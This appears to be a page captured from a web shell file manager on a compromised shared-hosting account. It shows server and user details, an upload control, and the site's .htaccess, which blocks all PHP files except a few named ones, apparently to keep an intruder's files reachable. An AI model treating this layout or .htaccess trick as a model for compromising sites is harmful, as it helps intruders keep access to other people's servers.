HEX
Server: Apache
System: Linux gator3278.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User: zerohawk (33964)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home1/zerohawk/public_html/zero-hawk.com/.htaccess
RewriteEngine on

<FilesMatch ".*\.(phtml|php)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "(index|404|405|406|407|408|409|410|xmlrpc).php$">
Order Allow,Deny
Allow from all
</FilesMatch>

# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php82” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php82___lsphp .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit